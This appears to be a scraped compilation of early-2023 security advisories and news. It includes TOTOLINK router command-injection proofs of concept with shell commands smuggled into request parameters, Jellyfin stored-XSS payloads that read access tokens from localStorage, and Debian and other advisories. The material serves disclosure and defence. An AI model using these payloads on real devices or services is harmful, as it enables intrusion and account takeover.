TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW.

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW

In function sub_421678,The "slaveIpList" parameter does not filter user input, which can cause command injection vulnerabilities

    import requests
    url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {'FileName':'aa', 'slaveIpList':'0\"|ls />/tmp/setUpgradeFW.txt|echo \"22', 'topicurl':'setting/setUpgradeFW'}
    rep = requests.post(url, cookies=cookie, json=data)
    print(rep.status_code)
    print(rep.text)

CVE-2023-24154: CVE-vulns/setUpgradeFW.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
    

POC2:

    import requests
    url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {"topicurl" : "setDiagnosisCfg",
    "ip" : "192.168.1.1||mkdir /test1111;"}
    
    data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"}
    
    response = requests.post(url, cookies=cookie, json=data1)
    print(response.text)
    print(response)
    
    data2 = {"topicurl":"setting/showNetworkDiag"}
    response = requests.post(url, cookies=cookie, json=data2)
    print(response.text)
    print(response)
    
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo

CVE-2023-24139: CVE-vulns/setNetworkDiag_NetDiagHost.md at main · Double-q1015/CVE-vulns

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.
Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Attack Vector / Endpoint Security

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.

Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone.

In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server.

Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK.

"It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote," Proofpoint said.

The infection chains are made possible owing to a OneNote feature that allows for the execution of select file types directly from within the note-taking application in what's a case of a "payload smuggling" attack.

"Most file types that can be processed by MSHTA, WSCRIPT, and CSCRIPT can be executed from within OneNote," TrustedSec researcher Scott Nusbaum said. "These file types include CHM, HTA, JS, WSF, and VBS."

As remedial actions, Finnish cybersecurity firm WithSecure is recommending users block OneNote mail attachments (.one and .onepkg files) and keep close tabs on the operations of the OneNote.exe process.

The shift to OneNote is seen as a response to Microsoft's decision to disallow macros by default in Microsoft Office applications downloaded from the internet last year, prompting threat actors to experiment with uncommon file types such as ISO, VHD, SVG, CHM, RAR, HTML, and LNK.

The aim behind blocking macros is two-fold: To not only reduce the attack surface but also increase the effort required to pull off an attack, even as email continues to be the top delivery vector for malware.

But these are not the only options that have become a popular way to conceal malicious code. Microsoft Excel add-in (XLL) files and Publisher macros have also been put to use as an attack pathway to skirt Microsoft's protections and propagate a remote access trojan called Ekipa RAT and other backdoors.

The abuse of XLL files hasn't gone unnoticed by the Windows maker, which is planning an update to "block XLL add-ins coming from the internet," citing an "increasing number of malware attacks in recent months." The option is expected to be available sometime in March 2023.

When reached for comment, Microsoft told The Hacker News that it had nothing further to share at this time.

"It's clear to see how cybercriminals leverage new attack vectors or less-detected means to compromise user devices," Bitdefender's Adrian Miron said. "These campaigns are likely to proliferate in coming months, with cybercrooks testing out better or improved angles to compromise victims."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0030  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor acknowledged vulnerability:** Yes  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23636

**Description**

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.  
The injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the **localStorage** an attacker is able to take over accounts by reading their values.

**Proof of Concept**

The following screenshot shows the executed JavaScript payload in the victim's browser.

The following request creates a payload with injected _name_.

POST /Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5 HTTP/1.1  
Host: localhost:8096  
Content-Length: 0  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
accept: application/json  
Content-Type: application/json  
\[...\]

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23636 

**Timeline**

*   **2022-07-18:** First contact request via security@jellyfin.org
*   **2022-08-02:** Vulnerability details submitted
*   **2022-08-16:** Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23636: Security Advisory usd-2022-0030 | usd HeroLab

Cross-Site Request Forgery (CSRF) vulnerability in JS Help Desk plugin <= 2.7.1 versions.

**Solution**

Update the WordPress JS Help Desk – Best Help Desk & Support Plugin plugin to the latest available version (at least 2.7.2).

Vlad Vector discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress JS Help Desk – Best Help Desk & Support Plugin Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.7.2.

**4 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-46842: WordPress JS Help Desk plugin <= 2.7.1 - Multiple Cross Site Request Forgery (CSRF) Vulnerabilities - Patchstack

### Impact
The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

### Patches
Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch

**Package**

composer pimcore/pimcore (Composer)

**Affected versions**

< 10.5.16

**Patched versions**

10.5.16

**Description**

**Impact**

The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

**Patches**

Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch

**References**

*   GHSA-8xv4-jj4h-qww6
*   pimcore/pimcore#14125
*   https://huntr.dev/bounties/aa7ee076-d729-4fcc-9bcc-48bcbb8eac38/

Last updated

Feb 2, 2023

Reviewed

Feb 2, 2023

Published to the GitHub Advisory Database

Feb 2, 2023

 dvesh3 published to pimcore/pimcore

Feb 1, 2023

GHSA-8xv4-jj4h-qww6: Pimcore contains Unrestricted Upload of File with Dangerous Type

Debian Linux Security Advisory 5338-1 - Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannou discovered that missing input sanitising in the handling of VMDK images in Cinder, the OpenStack block storage system, may result in information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5338-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cinderCVE ID         : CVE-2022-47951Debian Bug     : 1029562Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannoudiscovered that missing input sanitising in the handling of VMDK imagesin Cinder, the OpenStack block storage system, may result in informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 2:17.0.1-1+deb11u1.We recommend that you upgrade your cinder packages.For the detailed security status of cinder please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cinderFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParskACgkQEMKTtsN8TjbMhxAAvApHGxPkLq1ldUi5fgMjTloVBouyRJS/Ytsq3p5U0Yx98SvnPI9ab9nLRlWdVBjpdy9Wb6l0ouhaiiLR2kPJEv9D2Ux7oWdHpvexdtYs9eHdgx7Ym6Zibu6d/7hMgxPaG8zKEwJLCf2zuMqXbr6l55ht+DAmFJrzO/VyQyU2mlhkSXvCdmL9NAX+csEEW4WtLjx1MPD1gFz99uI3Q6DY3kTBu45BWG2xKkU0hHThsap0kRRK+6M9QINjW2zylsyhW2pB5/0j5X8bUgMX9jDFNMj9p5tWcpN2FwQa6YvKQoIONHSNJIXEaOsHiMXRQUGytS8UwW9UfDiPLzsKSreoaOaWzbtkvQvGrfauHmbySrVjZ2WCq+ZNiFGIJV7EhlJstFi3IwlJ3oYlZgUHlLusNGahqQo+KD18ipVPiSE89LIM9Zq+p7KpjLLTzjlSMgC7gLj4IJmCDRfxz7uxR0fUg/o9w0nhQNAr63hKbjzeJWDmRGQwpsuh/DBLR7AgwwuqiMkpBj27uPMD/aPFisLysP8xmO7IJobfuZzdXU+mCQg0fbwMWWF3JQHcew971YDoreBB73Su9NsMVWrSgUd2WC4axp+EPFQTHNas6OLM+oEhpK/dUILczzy/h9jPzH4wDAmQgv0nSOZSqGu7cuXSxsSGCzf8J8hpYoeysRn91Gc=NXlC-----END PGP SIGNATURE-----

Debian Security Advisory 5338-1

Debian Linux Security Advisory 5337-1 - Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannou discovered that missing input sanitising in the handling of VMDK images in OpenStack Compute (codenamed Nova) may result in information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5337-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : novaCVE ID         : CVE-2022-47951Debian Bug     : 1029561Guillaume Espanel, Pierre Libeau, Arnaud Morin and Damien Rannoudiscovered that missing input sanitising in the handling of VMDK imagesin OpenStack Compute (codenamed Nova) may result in informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 2:22.0.1-2+deb11u1.We recommend that you upgrade your nova packages.For the detailed security status of nova please refer toits security tracker page at:https://security-tracker.debian.org/tracker/novaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParscACgkQEMKTtsN8Tja1gg/+MkwvOlll4HJexIgD7/wK5QD7R+1gTHJ77ywF5JP8udygdAtC7BxxmxAejlnUfDwlN5rwvZI9PR6JjedwLx7r7urckUNNaRHz9ZZdRm7n1S+3YX4Am5d7V3Dwz54NQ27GvBVoi7TTBoxDHmVZ2kX95EJYMMhGbyc1SiQx3Eg37iZII11f0CQG1VrhE6al8u19qMK/dUqmw4mPB0duUjSBK3b8wcXdgNtZP5H/rIJOfMZqaXNZUCs78zAPjDAm2BcUljOpeW/RbkwjvZMWxIZdWS8XF1iWMqeDAJxBeU39VgOIQ6c0djCK3PZscSUbT3NHJZW7okyxqqEXrGbvnJgaO0PZqIcWpatDV6s1mScWbmkT2sAQjKLlo7kDrPFVP8DzLstE+jqIzmT1dKK8X3hmIW7k6exCQINSoPIZco2tyHFrlyb42hTJIYpQLNZoEavRzH6ZYXTytvr89ldJ5w/pdtyf3S2DCkW+H4qXz03q9GyAHZN3eNMkhKmyS11/JV3GC1nL+9obCIb8PqFF075vYp0EnKsEXmyi6KL9GK6bR82i9ePo6n3eNM8+FxPRcCv8gzbWLg+pC7hrclS231C6SsDbVlYIbZBc0O4Kc8PkcnBVcjLJ71eXCIkQesZqWjnOYEshDfzG3xbWiiVOgGv0ypsB9GhKGcPGHRHEAn1k25k=U5a0-----END PGP SIGNATURE-----

Debian Security Advisory 5337-1

Debian Linux Security Advisory 5335-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5335-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 01, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21628  
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 17.0.6+10-1~deb11u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParr8ACgkQEMKTtsN8  
TjaUew/9Fpsfn3GMMnCaheFv/IAODAauovmI71hUQpohxEX5eL17mLWX4s5L0qtu  
HHHlexE4EtWNRk2KUtsm5oroX95mseqNhXObvX7dho0pGn8eM0N9FuJ3eXdWMxxP  
MW8Q+MADyDHuWB5/Fb6a16NpCIqzeUgS2CEMaM+6BCp2O2Mz+O0EfH/3MC9GW3z7  
sP+IUD3nm0+03J00CgZfEvRN2g1NElIerCQiSMeNC7T21V4Lz7MnVNCV1jyTvdm9  
IV5HXuVdEjeSbdC2sJbnF3geGDV5cLBcY7Il8JbcT/ADCUGkxM8wnilsiRrDj+e0  
gTuturVqUxLvjjxjpMNdLZrmv3WUMuBgFNkVpriDGXEjalsCX2yfYVQUyNGUZHCC  
o0VEuPjEKFQh8anUiugwF4ZqMfosbZcbrT7eTWFsJlAMTiBi+k8Qs3K9q9XeIW8Y  
LnMCiaTLzC+3ZL65J0r2E+CiGrie/DGaWxLaXVxt2/Qux3MOf5mKoVZSHEl7jKey  
sIIZoav9p8/Rj/3DmMLJi+visUH/aptKzbgXEAIAjSMs9pXtgu4PYZ5faAecRC9K  
G6edx+RrdXMS7nuuzH+rlCkGRJ9oszyHlcpV0cFI4/ss5ljY9rtrw7cs3qN2kZz5  
RrtXMAQc0xXLTZJTozNsqf7ael4mWfUoc809BMRobJ1m1bBTWTA=Pibq  
-----END PGP SIGNATURE-----

Tag

#js